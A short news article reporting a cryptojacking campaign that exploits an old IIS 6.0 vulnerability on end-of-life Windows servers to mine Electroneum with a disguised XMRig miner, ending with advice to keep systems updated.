Following the regular increase in the crackdown on fake cryptocurrency ads by the companies like Google and Twitter, it seems like that the scammers have shifted their focus to cryptocurrency mining and attacking the government websites along with some messaging platforms and cloud servers like that of Tesla. The new security findings are pointing that the crypto jackers are now using the flaws in the Old Windows software, with primary attacks being made on the windows which are reaching or past the end of their official support for the cryptocurrency.
Some researchers from US-based security firm F5 Networks have recently discovered that a vulnerability in the Microsoft Internet Information Services 6.0 (IIS) is being targeted in order to seed malware and take control over Windows to mine the 'Electroneum' cryptocurrency.
This is however not the first time when the IIS 6.0 vulnerability is being exploited, the same flaw in the past allowed Lazarus group to launch malware attacks and mine Monero. The new stream of Electroneum-mining malware attack aims at a buffer overflow vulnerability which is called CVE-2017-7269 in the Windows IIS 6.0 servers, and it requires 'Squiblydoo' technique for seeding the malware and execute the malicious script. The vulnerability is said to be a part of Microsoft Windows Server 2003, which is an OS which had already reached the EOL (End-of-Life) a year ago.
As per some reports from the web, the malware makes use of fake 'lsass.eXe' filetype in order to mimic the original 'lsass.exe' process for creating confusion, and the executing a file which is the genuine 32-bit variant of a crypto jacking tool known as XMRig. The original servers that are hosting the malware are said to be based out of China and it directs the malware script to mine the Electroneum by using multiple numbers of pools and depositing them in a wallet.
It is being further reported that the cryptocurrency mining attack has deposited Electroneum worth around $99 in the hacker's cryptocurrency wallet. This seems to be less successful for the hacker. However, there might be a possibility that the hacker may use multiple Electroneum wallets to deposit his/her earning. There are a large number of computing devices which are still running on outdated software, which can attract the hackers and could be exploited for crypto-mining attacks. That said we would suggest our readers to keep their systems up to date download all the security updates that are available. We will keep you posted with further updates, so stay tuned.